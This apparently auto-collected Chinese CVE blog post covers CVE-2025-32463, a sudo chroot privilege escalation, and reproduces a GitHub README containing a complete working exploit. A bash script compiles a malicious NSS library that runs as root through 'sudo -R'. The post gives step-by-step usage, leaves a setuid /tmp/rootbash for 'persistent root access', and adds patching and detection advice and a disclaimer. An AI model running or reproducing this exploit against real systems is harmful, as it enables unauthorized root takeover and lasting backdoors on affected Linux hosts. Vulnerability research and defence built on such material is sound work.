Sudo Chroot Privilege Escalation Vulnerability

漏洞信息

漏洞名称: Sudo Chroot Privilege Escalation Vulnerability

漏洞编号:

  • CVE: CVE-2025-32463

漏洞类型: 权限提升

漏洞等级: 严重

漏洞描述: CVE-2025-32463是一个在sudo版本1.9.14至1.9.17中发现的严重本地权限提升漏洞。该漏洞允许具有sudo权限的攻击者通过利用chroot选项处理逻辑中的设计缺陷,提升至root访问权限。

受影响产品: sudo是一个广泛使用的命令行程序,允许用户以其他用户的权限运行程序,通常用于Unix和Linux系统中。它是系统管理员和普通用户日常操作中不可或缺的工具,部署在几乎所有的Unix-like系统中。

漏洞解释: 此漏洞属于本地权限提升类型,其技术根源在于sudo的安全验证过程中的时序问题。具体来说,pivot_root函数在安全策略验证之前执行,这使得攻击者能够操纵用于认证和授权的文件系统环境。通过创建一个受控的chroot环境并放置恶意的NSS(名称服务切换)库,攻击者可以诱导sudo加载并执行该库,从而获得root权限。

影响分析: 此漏洞带来的安全风险极为严重,因为它允许攻击者在不需要任何认证的情况下,从具有sudo权限的用户账户提升至root权限。这意味着攻击者可以完全控制系统,执行任意命令,访问敏感数据,甚至破坏系统服务。由于漏洞利用过程可以自动化,且不需要用户交互,因此其潜在危害极大。此外,由于sudo是系统核心组件,几乎所有的Unix-like系统都可能受到影响,使得漏洞的广泛性和严重性进一步增加。

产品厂商: sudo

产品名称: sudo

影响版本: 1.9.14 <= version <= 1.9.17

来源: https://github.com/KaiHT-Ladiant/CVE-2025-32463

类型: CVE-2025:github search

仓库文件

  • README.md
  • cve-2025-32463.sh

来源概述

CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

Overview

CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. This vulnerability allows attackers with sudo privileges to escalate to root access by exploiting a design flaw in the chroot option processing logic.

Vulnerability Details

  • CVE ID: CVE-2025-32463
  • Affected Versions: sudo 1.9.14 - 1.9.17
  • Vulnerability Type: Local Privilege Escalation (LPE)
  • Severity: Critical
  • Patched Version: sudo 1.9.17p1 and later

Technical Description

The vulnerability occurs due to a timing issue in sudo’s security validation process. The pivot_root function is executed before security policy verification, allowing attackers to manipulate the file system environment that sudo uses for authentication and authorization.

Attack Flow

  1. Environment Manipulation: Attacker creates a controlled chroot environment with malicious nsswitch.conf
  2. Library Injection: Malicious NSS (Name Service Switch) library is placed in the controlled environment
  3. Privilege Escalation: sudo loads and executes the malicious library with root privileges
  4. Root Access: Attacker gains full root shell access

Affected Functions

  • pivot_root: Executed too early in the process
  • set_cmnd_path: Operates in the manipulated environment
  • command_matches: Security checks bypassed due to environment manipulation

Prerequisites

Before using this exploit, ensure the following conditions are met:

  • Target system runs sudo version 1.9.14 - 1.9.17
  • Current user has sudo privileges
  • sudoers configuration allows chroot operations
  • gcc compiler is available on the target system
  • Write access to temporary directories (e.g., /tmp)

Usage

Quick Start

  1. Clone this repository:
1
2
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
  1. Make the script executable:
1
chmod +x cve-2025-32463.sh
  1. Run the exploit:
1
./cve-2025-32463.sh

Manual Verification

Check if the target system is vulnerable:

1
2
3
4
5
6
7
8
## Check sudo version
sudo --version

## Check sudo privileges
sudo -l

## Look for chroot-related permissions
sudo -l | grep chroot

Exploit Code

The main exploit script (cve-2025-32463.sh):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/bin/bash
## CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
## Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > kai_ht.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /kai_ht" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/kai_ht.so.2 kai_ht.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

## Cleanup
rm -rf ${STAGE?}

Verification

After successful exploitation, verify root access:

1
2
3
4
5
6
7
8
## Check current privileges
whoami

## Check proof file
cat /tmp/pwned_proof.txt

## Use setuid bash for persistent root access
/tmp/rootbash -p

Mitigation

Immediate Actions

  1. Update sudo to version 1.9.17p1 or later:

    1
    2
    3
    4
    5
    6
    7
    8
    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo

    # CentOS/RHEL
    sudo yum update sudo

    # or
    sudo dnf update sudo

  2. Remove chroot directives from sudoers (temporary workaround):

    1
    2
    3
    4
    5
    6
    7
    8
    # Backup current configuration
    sudo cp /etc/sudoers /etc/sudoers.backup

    # Remove chroot-related entries
    sudo sed -i '/chroot/d' /etc/sudoers

    # Verify syntax
    sudo visudo -c

Detection

Monitor for exploitation attempts:

1
2
3
4
5
6
7
8
## Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

## Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

## Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f

Technical Details

Root Cause Analysis

The vulnerability stems from a design flaw in sudo’s execution flow:

  1. Normal Expected Flow:

    • Parse user input
    • Validate sudoers policy
    • Set up environment (including chroot)
    • Execute command

  2. Actual Vulnerable Flow:

    • Parse user input
    • Execute chroot (pivot_root) - Problem occurs here
    • Validate sudoers policy (in manipulated environment)
    • Execute command

NSS Library Exploitation

The exploit leverages the Name Service Switch (NSS) system:

  1. Sudo reads /etc/nsswitch.conf for user authentication
  2. In the chroot environment, attacker controls this file
  3. Malicious NSS library is loaded with root privileges
  4. Library constructor executes arbitrary code as root

Testing Environment

This exploit has been tested on:

  • Ubuntu 20.04/22.04 with sudo 1.9.15
  • Debian 11/12 with sudo 1.9.14-1.9.17
  • CentOS 8/9 with affected sudo versions
  • Docker containers with vulnerable sudo installations

References

Disclaimer

⚠️ IMPORTANT DISCLAIMER ⚠️

This tool is provided for educational and authorized testing purposes only.

  • Use only on systems you own or have explicit permission to test
  • Unauthorized use of this exploit is illegal and unethical
  • The authors are not responsible for any misuse or damage
  • Always ensure you have proper authorization before conducting security testing

Contributing

Contributions are welcome! Please:

  1. Fork the repository
  2. Create a feature branch
  3. Submit a pull request with detailed description

License

This project is licensed under the MIT License - see the LICENSE file for details.

Changelog

v1.0.0

  • Initial release
  • Basic exploit functionality
  • Comprehensive documentation

Note: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.

Github Poc
#CVE-2025:github search #权限提升
Sudo Chroot Privilege Escalation Vulnerability
http://example.com/2025/07/29/github_3917622381/
作者
lianccc
发布于
2025年7月29日
许可协议